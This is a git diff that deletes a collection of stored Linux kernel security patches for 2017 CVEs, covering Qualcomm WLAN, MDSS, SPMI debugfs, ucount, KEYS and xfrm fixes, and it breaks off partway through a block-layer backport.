--				dbbus_tx_data[1] = ((PoolAddr + offset) >> 8)
--									& 0xFF;
--				dbbus_tx_data[2] = (PoolAddr + offset) & 0xFF;
--				mutex_lock(&msg21xx_mutex);
--				write_i2c_seq(ts_data, ts_data->client->addr,
--							&dbbus_tx_data[0], 3);
--				read_i2c_seq(ts_data, ts_data->client->addr,
--					&buf[offset],
--					left > TransLen ? TransLen : left);
--				mutex_unlock(&msg21xx_mutex);
--
--				if (left > TransLen) {
--					left -= TransLen;
--					offset += TransLen;
--				} else {
--					left = 0;
--				}
--			}
--
--			for (i = 0; i < cnt; i++) {
--				for (j = 0; j < row; j++) {
--					if (units == 1) {
--						u8Data = buf[i * row * units +
--								j * units];
--					} else if (units == 2) {
--						s16Data = buf[i * row * units +
--						j * units] +
--						(buf[i * row * units +
--						j * units + 1] << 8);
--					} else if (units == 4) {
--						s32Data = buf[i * row * units +
--						j * units] +
--						(buf[i * row * units +
--						j * units + 1] << 8) +
--						(buf[i * row * units +
--						j * units + 2] << 16) +
--						(buf[i * row * units +
--						j * units + 3] << 24);
--					}
--				}
--			}
--
--			kfree(buf);
--		}
--	}
--
--	return 0;
--}
--
--static void tp_print_create_entry(struct msg21xx_ts_data *ts_data)
--{
--	unsigned char dbbus_tx_data[3] = {0};
--	unsigned char dbbus_rx_data[8] = {0};
--
--	dbbus_tx_data[0] = 0x53;
--	dbbus_tx_data[1] = 0x00;
--	dbbus_tx_data[2] = 0x58;
--	mutex_lock(&msg21xx_mutex);
--	write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 3);
--	read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4);
--	mutex_unlock(&msg21xx_mutex);
--	InfoAddr = (dbbus_rx_data[1]<<8) + dbbus_rx_data[0];
--	PoolAddr = (dbbus_rx_data[3]<<8) + dbbus_rx_data[2];
--
--	if ((InfoAddr != 0x0F) && (PoolAddr != 0x10)) {
--		msleep(20);
--		dbbus_tx_data[0] = 0x53;
--		dbbus_tx_data[1] = (InfoAddr >> 8) & 0xFF;
--		dbbus_tx_data[2] = InfoAddr & 0xFF;
--		mutex_lock(&msg21xx_mutex);
--		write_i2c_seq(ts_data, ts_data->client->addr,
--						&dbbus_tx_data[0], 3);
--		read_i2c_seq(ts_data, ts_data->client->addr,
--						&dbbus_rx_data[0], 8);
--		mutex_unlock(&msg21xx_mutex);
--
--		units = dbbus_rx_data[0];
--		row = dbbus_rx_data[1];
--		cnt = dbbus_rx_data[2];
--		TransLen = (dbbus_rx_data[7]<<8) + dbbus_rx_data[6];
--
--		if (device_create_file(&ts_data->client->dev,
--						&dev_attr_tpp) < 0)
--			dev_err(&ts_data->client->dev, "Failed to create device file(%s)!\n",
--					dev_attr_tpp.attr.name);
--	}
--}
--#endif
--
--MODULE_AUTHOR("MStar Semiconductor, Inc.");
--MODULE_LICENSE("GPL v2");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6423/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6423/ANY/0001.patch
deleted file mode 100644
index d561f1ca..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6423/ANY/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From 0f264f812b61884390b432fdad081a3e995ba768 Mon Sep 17 00:00:00 2001
-From: Kaushal Kumar <kaushalk@codeaurora.org>
-Date: Fri, 20 Jan 2017 15:23:40 +0530
-Subject: soc: qcom: make debugfs support configurable for kryo l2 accessors
- driver
-
-Add config option to enable/disable l2 indirect access debug capability.
-The driver exposes l2 indirect access debugfs interface to get/set data,
-address, and target cpus so keep it disabled by default.
-
-Change-Id: I22f84d16a3bf12a78295f2d052bb50e90d6f2a8b
-Signed-off-by: Kaushal Kumar <kaushalk@codeaurora.org>
----
- drivers/soc/qcom/Kconfig             | 10 ++++++++++
- drivers/soc/qcom/kryo-l2-accessors.c |  6 +++---
- 2 files changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/soc/qcom/Kconfig b/drivers/soc/qcom/Kconfig
-index ae2f304..b039090 100644
---- a/drivers/soc/qcom/Kconfig
-+++ b/drivers/soc/qcom/Kconfig
-@@ -292,6 +292,16 @@ config MSM_CACHE_M4M_ERP64_PANIC_ON_UE
-          Say 'Y' here to cause kernel panic when uncorrectable cache/M4M errors
-          are detected.
- 
-+config MSM_L2_IA_DEBUG
-+       bool "Enable MSM L2 Indirect Access Debug"
-+       depends on DEBUG_FS
-+       default n
-+       help
-+         This option enables L2 indirect access debug
-+         capability. It exposes L2 indirect access
-+         debugfs interface to get/set data, address,
-+         and target cpus.
-+
- config MSM_RPM_SMD
- 	bool "RPM driver using SMD protocol"
- 	help
-diff --git a/drivers/soc/qcom/kryo-l2-accessors.c b/drivers/soc/qcom/kryo-l2-accessors.c
-index a945f9e..1d81074 100644
---- a/drivers/soc/qcom/kryo-l2-accessors.c
-+++ b/drivers/soc/qcom/kryo-l2-accessors.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -80,7 +80,7 @@ u64 get_l2_indirect_reg(u64 reg)
- }
- EXPORT_SYMBOL(get_l2_indirect_reg);
- 
--#if defined(CONFIG_DEBUG_FS)
-+#if defined(CONFIG_MSM_L2_IA_DEBUG)
- 
- static u32 debug_addr;
- static int debug_target_cpu;
-@@ -180,4 +180,4 @@ static int l2_ia_debug_init(void)
- }
- late_initcall(l2_ia_debug_init);
- 
--#endif /* CONFIG_DEBUG_FS */
-+#endif /* CONFIG_MSM_L2_IA_DEBUG */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6424/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-6424/prima/0001.patch
deleted file mode 100644
index a91f45c3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6424/prima/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 8cac3c4aac106b917e60e7aa7d4c4189e376913c Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal <naggar@codeaurora.org>
-Date: Fri, 10 Feb 2017 15:48:13 +0530
-Subject: wlan: Fix buffer overflow in WLANSAP_Set_WPARSNIes()
-
-qcacld-2.0 to prima propagation
-
-Currently In WLANSAP_Set_WPARSNIes() the parameter WPARSNIEsLen
-is user-controllable and never validates which uses as the length
-for a memory copy. This enables user-space applications to corrupt
-heap memory and potentially crash the kernel.
-
-Fix is to validate the WPARSNIes length to its max before use as the
-length for a memory copy.
-
-Change-Id: I7aff731aeae22bfd84beb955439a799abef37f68
-CRs-Fixed: 1102648
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 33f7d50..c0c5c14 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -4180,6 +4180,14 @@ static int __iw_set_ap_genie(struct net_device *dev,
-         return 0;
-     }
- 
-+    if (wrqu->data.length > DOT11F_IE_RSN_MAX_LEN)
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  "%s: WPARSN Ie input length is more than max[%d]", __func__,
-+                  wrqu->data.length);
-+        return -EINVAL;
-+   }
-+
-     switch (genie[0])
-     {
-         case DOT11F_EID_WPA:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-6424/qcacld-2.0/0002.patch
deleted file mode 100644
index cfc79dea..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 5cc2ac840e36a3342c5194c20b314f0bb95ef7e1 Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal <naggar@codeaurora.org>
-Date: Thu, 12 Jan 2017 14:32:02 +0530
-Subject: qcacld-2.0: Fix buffer overflow in WLANSAP_Set_WPARSNIes()
-
-Currently In WLANSAP_Set_WPARSNIes() the parameter WPARSNIEsLen
-is user-controllable and never validates which uses as the length
-for a memory copy. This enables user-space applications to corrupt
-heap memory and potentially crash the kernel.
-
-Fix is to validate the WPARSNIes length to its max before use as the
-length for a memory copy.
-
-Change-Id: I7aff731aeae22bfd84beb955439a799abef37f68
-CRs-Fixed: 1102648
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 693c0c9..59b32f2 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -6099,6 +6099,13 @@ static int __iw_set_ap_genie(struct net_device *dev,
-         return 0;
-     }
- 
-+    if (wrqu->data.length > DOT11F_IE_RSN_MAX_LEN) {
-+       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+               "%s: WPARSN Ie input length is more than max[%d]", __func__,
-+                wrqu->data.length);
-+       return -EINVAL;
-+    }
-+
-     switch (genie[0])
-     {
-         case DOT11F_EID_WPA:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-3.0/0003.patch b/Patches/Linux_CVEs/CVE-2017-6424/qcacld-3.0/0003.patch
deleted file mode 100644
index 6f2cfdad..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-3.0/0003.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 4e44b25b26a594aa8180827729d2b298c894fc5d Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal <naggar@codeaurora.org>
-Date: Mon, 30 Jan 2017 15:32:32 +0530
-Subject: qcacld-3.0: Fix buffer overflow in WLANSAP_Set_WPARSNIes()
-
-qcacld-2.0 to qcacld-3.0 propagation
-
-Currently In WLANSAP_Set_WPARSNIes() the parameter WPARSNIEsLen
-is user-controllable and never validates which uses as the length
-for a memory copy. This enables user-space applications to corrupt
-heap memory and potentially crash the kernel.
-
-Fix is to validate the WPARSNIes length to its max before use as the
-length for a memory copy.
-
-Change-Id: I7aff731aeae22bfd84beb955439a799abef37f68
-CRs-Fixed: 1102648
----
- core/hdd/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_hostapd.c b/core/hdd/src/wlan_hdd_hostapd.c
-index c01d6a6..78c9df6 100644
---- a/core/hdd/src/wlan_hdd_hostapd.c
-+++ b/core/hdd/src/wlan_hdd_hostapd.c
-@@ -4979,6 +4979,12 @@ static int __iw_set_ap_genie(struct net_device *dev,
- 		return 0;
- 	}
- 
-+	if (wrqu->data.length > DOT11F_IE_RSN_MAX_LEN) {
-+		hdd_err("%s: WPARSN Ie input length is more than max[%d]",
-+			__func__, wrqu->data.length);
-+		return QDF_STATUS_E_INVAL;
-+	}
-+
- 	switch (genie[0]) {
- 	case DOT11F_EID_WPA:
- 	case DOT11F_EID_RSN:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6425/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6425/ANY/0001.patch
deleted file mode 100644
index 3c156278..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6425/ANY/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From ef86560a21fe1f256f6ba772a195201ff202c657 Mon Sep 17 00:00:00 2001
-From: "Sravan Kumar D.V.N" <sravank1@codeaurora.org>
-Date: Fri, 6 Jan 2017 13:50:04 +0530
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1103689
-Change-Id: I405500f427f3f4dc4d38a9fb188fece9a31614ca
-Signed-off-by: Sravan Kumar D.V.N <sravank1@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index ce786f2..35b1b49 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  * Copyright (C) 1994 Martin Schaller
-  *
-  * 2001 - Documented with DocBook
-@@ -965,6 +965,7 @@ static int __to_user_pcc_coeff_v1_7(
- 	struct mdp_pcc_data_v1_7_32 pcc_cfg_payload32;
- 	struct mdp_pcc_data_v1_7 pcc_cfg_payload;
- 
-+	memset(&pcc_cfg_payload32, 0, sizeof(pcc_cfg_payload32));
- 	if (copy_from_user(&pcc_cfg_payload,
- 			   pcc_cfg->cfg_payload,
- 			   sizeof(struct mdp_pcc_data_v1_7))) {
-@@ -2160,6 +2161,7 @@ static int __to_user_pa_data_v1_7(
- 	struct mdp_pa_data_v1_7_32 pa_cfg_payload32;
- 	struct mdp_pa_data_v1_7 pa_cfg_payload;
- 
-+	memset(&pa_cfg_payload32, 0, sizeof(pa_cfg_payload32));
- 	if (copy_from_user(&pa_cfg_payload,
- 			pa_v2_cfg->cfg_payload,
- 			sizeof(pa_cfg_payload))) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6426/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6426/ANY/0001.patch
deleted file mode 100644
index 1243066b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6426/ANY/0001.patch
+++ /dev/null
@@ -1,124 +0,0 @@
-From 80decd6365deec08c35ecb902a58f9210599b39a Mon Sep 17 00:00:00 2001
-From: ansharma <ansharma@codeaurora.org>
-Date: Fri, 20 Jan 2017 14:43:57 +0530
-Subject: platform: msm: spmi: Fix possible race condition in debugfs
-
-There is a possible race condition when debugfs files are concurrently
-accessed by multiple threads. Fix this.
-
-CRs-Fixed: 1106842
-Change-Id: Ifd092143f428db3cf73c45ec4f0aaa96318ae165
-Signed-off-by: ansharma <ansharma@codeaurora.org>
----
- drivers/platform/msm/spmi/spmi-dbgfs.c | 37 +++++++++++++++++++++++++---------
- 1 file changed, 28 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/platform/msm/spmi/spmi-dbgfs.c b/drivers/platform/msm/spmi/spmi-dbgfs.c
-index b0a354b..86f1b0d 100644
---- a/drivers/platform/msm/spmi/spmi-dbgfs.c
-+++ b/drivers/platform/msm/spmi/spmi-dbgfs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -69,6 +69,7 @@ struct spmi_trans {
- 	u32 addr;	/* 20-bit address: SID + PID + Register offset */
- 	u32 offset;	/* Offset of last read data */
- 	bool raw_data;	/* Set to true for raw data dump */
-+	struct mutex spmi_dfs_lock; /* Prevent thread concurrency */
- 	struct spmi_controller *ctrl;
- 	struct spmi_log_buffer *log; /* log buffer */
- };
-@@ -168,6 +169,7 @@ static int spmi_dfs_open(struct spmi_ctrl_data *ctrl_data, struct file *file)
- 	trans->addr = ctrl_data->addr;
- 	trans->ctrl = ctrl_data->ctrl;
- 	trans->offset = trans->addr;
-+	mutex_init(&trans->spmi_dfs_lock);
- 
- 	file->private_data = trans;
- 	return 0;
-@@ -197,6 +199,7 @@ static int spmi_dfs_close(struct inode *inode, struct file *file)
- 
- 	if (trans && trans->log) {
- 		file->private_data = NULL;
-+		mutex_destroy(&trans->spmi_dfs_lock);
- 		kfree(trans->log);
- 		kfree(trans);
- 	}
-@@ -473,14 +476,21 @@ static ssize_t spmi_dfs_reg_write(struct file *file, const char __user *buf,
- 	int cnt = 0;
- 	u8  *values;
- 	size_t ret = 0;
--
-+	u32 offset;
-+	char *kbuf;
- 	struct spmi_trans *trans = file->private_data;
--	u32 offset = trans->offset;
-+
-+	mutex_lock(&trans->spmi_dfs_lock);
-+
-+	trans = file->private_data;
-+	offset = trans->offset;
- 
- 	/* Make a copy of the user data */
--	char *kbuf = kmalloc(count + 1, GFP_KERNEL);
--	if (!kbuf)
--		return -ENOMEM;
-+	kbuf = kmalloc(count + 1, GFP_KERNEL);
-+	if (!kbuf) {
-+		ret = -ENOMEM;
-+		goto unlock_mutex;
-+	}
- 
- 	ret = copy_from_user(kbuf, buf, count);
- 	if (ret == count) {
-@@ -517,6 +527,8 @@ static ssize_t spmi_dfs_reg_write(struct file *file, const char __user *buf,
- 
- free_buf:
- 	kfree(kbuf);
-+unlock_mutex:
-+	mutex_unlock(&trans->spmi_dfs_lock);
- 	return ret;
- }
- 
-@@ -537,10 +549,13 @@ static ssize_t spmi_dfs_reg_read(struct file *file, char __user *buf,
- 	size_t ret;
- 	size_t len;
- 
-+	mutex_lock(&trans->spmi_dfs_lock);
- 	/* Is the the log buffer empty */
- 	if (log->rpos >= log->wpos) {
--		if (get_log_data(trans) <= 0)
--			return 0;
-+		if (get_log_data(trans) <= 0) {
-+			len = 0;
-+			goto unlock_mutex;
-+		}
- 	}
- 
- 	len = min(count, log->wpos - log->rpos);
-@@ -548,7 +563,8 @@ static ssize_t spmi_dfs_reg_read(struct file *file, char __user *buf,
- 	ret = copy_to_user(buf, &log->data[log->rpos], len);
- 	if (ret == len) {
- 		pr_err("error copy SPMI register values to user\n");
--		return -EFAULT;
-+		len = -EFAULT;
-+		goto unlock_mutex;
- 	}
- 
- 	/* 'ret' is the number of bytes not copied */
-@@ -556,6 +572,9 @@ static ssize_t spmi_dfs_reg_read(struct file *file, char __user *buf,
- 
- 	*ppos += len;
- 	log->rpos += len;
-+
-+unlock_mutex:
-+	mutex_unlock(&trans->spmi_dfs_lock);
- 	return len;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6874/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-6874/^4.10/0001.patch
deleted file mode 100644
index ed0eb437..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6874/^4.10/0001.patch
+++ /dev/null
@@ -1,89 +0,0 @@
-From 040757f738e13caaa9c5078bca79aa97e11dde88 Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman" <ebiederm@xmission.com>
-Date: Sun, 5 Mar 2017 15:03:22 -0600
-Subject: ucount: Remove the atomicity from ucount->count
-
-Always increment/decrement ucount->count under the ucounts_lock.  The
-increments are there already and moving the decrements there means the
-locking logic of the code is simpler.  This simplification in the
-locking logic fixes a race between put_ucounts and get_ucounts that
-could result in a use-after-free because the count could go zero then
-be found by get_ucounts and then be freed by put_ucounts.
-
-A bug presumably this one was found by a combination of syzkaller and
-KASAN.  JongWhan Kim reported the syzkaller failure and Dmitry Vyukov
-spotted the race in the code.
-
-Cc: stable@vger.kernel.org
-Fixes: f6b2db1a3e8d ("userns: Make the count of user namespaces per user")
-Reported-by: JongHwan Kim <zzoru007@gmail.com>
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Reviewed-by: Andrei Vagin <avagin@gmail.com>
-Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
----
- include/linux/user_namespace.h |  2 +-
- kernel/ucount.c                | 18 +++++++++++-------
- 2 files changed, 12 insertions(+), 8 deletions(-)
-
-diff --git a/include/linux/user_namespace.h b/include/linux/user_namespace.h
-index be76523..32354b4 100644
---- a/include/linux/user_namespace.h
-+++ b/include/linux/user_namespace.h
-@@ -72,7 +72,7 @@ struct ucounts {
- 	struct hlist_node node;
- 	struct user_namespace *ns;
- 	kuid_t uid;
--	atomic_t count;
-+	int count;
- 	atomic_t ucount[UCOUNT_COUNTS];
- };
- 
-diff --git a/kernel/ucount.c b/kernel/ucount.c
-index 62630a4..b4eeee0 100644
---- a/kernel/ucount.c
-+++ b/kernel/ucount.c
-@@ -144,7 +144,7 @@ static struct ucounts *get_ucounts(struct user_namespace *ns, kuid_t uid)
- 
- 		new->ns = ns;
- 		new->uid = uid;
--		atomic_set(&new->count, 0);
-+		new->count = 0;
- 
- 		spin_lock_irq(&ucounts_lock);
- 		ucounts = find_ucounts(ns, uid, hashent);
-@@ -155,8 +155,10 @@ static struct ucounts *get_ucounts(struct user_namespace *ns, kuid_t uid)
- 			ucounts = new;
- 		}
- 	}
--	if (!atomic_add_unless(&ucounts->count, 1, INT_MAX))
-+	if (ucounts->count == INT_MAX)
- 		ucounts = NULL;
-+	else
-+		ucounts->count += 1;
- 	spin_unlock_irq(&ucounts_lock);
- 	return ucounts;
- }
-@@ -165,13 +167,15 @@ static void put_ucounts(struct ucounts *ucounts)
- {
- 	unsigned long flags;
- 
--	if (atomic_dec_and_test(&ucounts->count)) {
--		spin_lock_irqsave(&ucounts_lock, flags);
-+	spin_lock_irqsave(&ucounts_lock, flags);
-+	ucounts->count -= 1;
-+	if (!ucounts->count)
- 		hlist_del_init(&ucounts->node);
--		spin_unlock_irqrestore(&ucounts_lock, flags);
-+	else
-+		ucounts = NULL;
-+	spin_unlock_irqrestore(&ucounts_lock, flags);
- 
--		kfree(ucounts);
--	}
-+	kfree(ucounts);
- }
- 
- static inline bool atomic_inc_below(atomic_t *v, int u)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6951/^3.14/0001.patch b/Patches/Linux_CVEs/CVE-2017-6951/^3.14/0001.patch
deleted file mode 100644
index a38cafa9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6951/^3.14/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 44d6e10f77095133e3882529a16b686b2305e6b0 Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Tue, 18 Apr 2017 15:31:08 +0100
-Subject: KEYS: Change the name of the dead type to ".dead" to prevent user
- access
-
-commit c1644fe041ebaf6519f6809146a77c3ead9193af upstream.
-
-This fixes CVE-2017-6951.
-
-Userspace should not be able to do things with the "dead" key type as it
-doesn't have some of the helper functions set upon it that the kernel
-needs.  Attempting to use it may cause the kernel to crash.
-
-Fix this by changing the name of the type to ".dead" so that it's rejected
-up front on userspace syscalls by key_get_type_from_user().
-
-Though this doesn't seem to affect recent kernels, it does affect older
-ones, certainly those prior to:
-
-	commit c06cfb08b88dfbe13be44a69ae2fdc3a7c902d81
-	Author: David Howells <dhowells@redhat.com>
-	Date:   Tue Sep 16 17:36:06 2014 +0100
-	KEYS: Remove key_type::match in favour of overriding default by match_preparse
-
-which went in before 3.18-rc1.
-
-Signed-off-by: David Howells <dhowells@redhat.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- security/keys/gc.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/security/keys/gc.c b/security/keys/gc.c
-index addf060..9cb4fe4 100644
---- a/security/keys/gc.c
-+++ b/security/keys/gc.c
-@@ -46,7 +46,7 @@ static unsigned long key_gc_flags;
-  * immediately unlinked.
-  */
- struct key_type key_type_dead = {
--	.name = "dead",
-+	.name = ".dead",
- };
- 
- /*
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7184/ANY/0001.patch
deleted file mode 100644
index f07a8bf6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 677e806da4d916052585301785d847c3b3e6186a Mon Sep 17 00:00:00 2001
-From: Andy Whitcroft <apw@canonical.com>
-Date: Wed, 22 Mar 2017 07:29:31 +0000
-Subject: xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window
-
-When a new xfrm state is created during an XFRM_MSG_NEWSA call we
-validate the user supplied replay_esn to ensure that the size is valid
-and to ensure that the replay_window size is within the allocated
-buffer.  However later it is possible to update this replay_esn via a
-XFRM_MSG_NEWAE call.  There we again validate the size of the supplied
-buffer matches the existing state and if so inject the contents.  We do
-not at this point check that the replay_window is within the allocated
-memory.  This leads to out-of-bounds reads and writes triggered by
-netlink packets.  This leads to memory corruption and the potential for
-priviledge escalation.
-
-We already attempt to validate the incoming replay information in
-xfrm_new_ae() via xfrm_replay_verify_len().  This confirms that the user
-is not trying to change the size of the replay state buffer which
-includes the replay_esn.  It however does not check the replay_window
-remains within that buffer.  Add validation of the contained
-replay_window.
-
-CVE-2017-7184
-Signed-off-by: Andy Whitcroft <apw@canonical.com>
-Acked-by: Steffen Klassert <steffen.klassert@secunet.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- net/xfrm/xfrm_user.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
-index 9705c27..cdf887f 100644
---- a/net/xfrm/xfrm_user.c
-+++ b/net/xfrm/xfrm_user.c
-@@ -415,6 +415,9 @@ static inline int xfrm_replay_verify_len(struct xfrm_replay_state_esn *replay_es
- 	if (nla_len(rp) < ulen || xfrm_replay_state_esn_len(replay_esn) != ulen)
- 		return -EINVAL;
- 
-+	if (up->replay_window > up->bmp_len * sizeof(__u32) * 8)
-+		return -EINVAL;
-+
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-7184/ANY/0002.patch
deleted file mode 100644
index d484354e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7184/ANY/0002.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From f843ee6dd019bcece3e74e76ad9df0155655d0df Mon Sep 17 00:00:00 2001
-From: Andy Whitcroft <apw@canonical.com>
-Date: Thu, 23 Mar 2017 07:45:44 +0000
-Subject: xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder
-
-Kees Cook has pointed out that xfrm_replay_state_esn_len() is subject to
-wrapping issues.  To ensure we are correctly ensuring that the two ESN
-structures are the same size compare both the overall size as reported
-by xfrm_replay_state_esn_len() and the internal length are the same.
-
-CVE-2017-7184
-Signed-off-by: Andy Whitcroft <apw@canonical.com>
-Acked-by: Steffen Klassert <steffen.klassert@secunet.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- net/xfrm/xfrm_user.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
-index cdf887f..40a8aa3 100644
---- a/net/xfrm/xfrm_user.c
-+++ b/net/xfrm/xfrm_user.c
-@@ -412,7 +412,11 @@ static inline int xfrm_replay_verify_len(struct xfrm_replay_state_esn *replay_es
- 	up = nla_data(rp);
- 	ulen = xfrm_replay_state_esn_len(up);
- 
--	if (nla_len(rp) < ulen || xfrm_replay_state_esn_len(replay_esn) != ulen)
-+	/* Check the overall length and the internal bitmap length to avoid
-+	 * potential overflow. */
-+	if (nla_len(rp) < ulen ||
-+	    xfrm_replay_state_esn_len(replay_esn) != ulen ||
-+	    replay_esn->bmp_len != up->bmp_len)
- 		return -EINVAL;
- 
- 	if (up->replay_window > up->bmp_len * sizeof(__u32) * 8)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch
deleted file mode 100644
index a1d4210c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0004.patch
+++ /dev/null
@@ -1,383 +0,0 @@
-From 60ebd48061949405fe6a69aa921d47b40f474a41 Mon Sep 17 00:00:00 2001
-From: Jens Axboe <axboe@fb.com>
-Date: Fri, 06 Jun 2014 07:57:37 -0600
-Subject: [PATCH] BACKPORT: block: add blk_rq_set_block_pc()
-
-With the optimizations around not clearing the full request at alloc
-time, we are leaving some of the needed init for REQ_TYPE_BLOCK_PC
-up to the user allocating the request.
-
-Add a blk_rq_set_block_pc() that sets the command type to
-REQ_TYPE_BLOCK_PC, and properly initializes the members associated
-with this type of request. Update callers to use this function instead
-of manipulating rq->cmd_type directly.
-
-Includes fixes from Christoph Hellwig <hch@lst.de> for my half-assed
-attempt.
-
-Change-Id: Ifc386dfb951c5d6adebf48ff38135dda28e4b1ce
-Signed-off-by: Jens Axboe <axboe@fb.com>
----
-
-diff --git a/block/blk-core.c b/block/blk-core.c
-index bce8d73..7cb3157 100644
---- a/block/blk-core.c
-+++ b/block/blk-core.c
-@@ -1189,6 +1189,8 @@
- 	if (unlikely(!rq))
- 		return ERR_PTR(-ENOMEM);
- 
-+	blk_rq_set_block_pc(rq);
-+
- 	for_each_bio(bio) {
- 		struct bio *bounce_bio = bio;
- 		int ret;
-@@ -1206,6 +1208,22 @@
- EXPORT_SYMBOL(blk_make_request);
- 
- /**
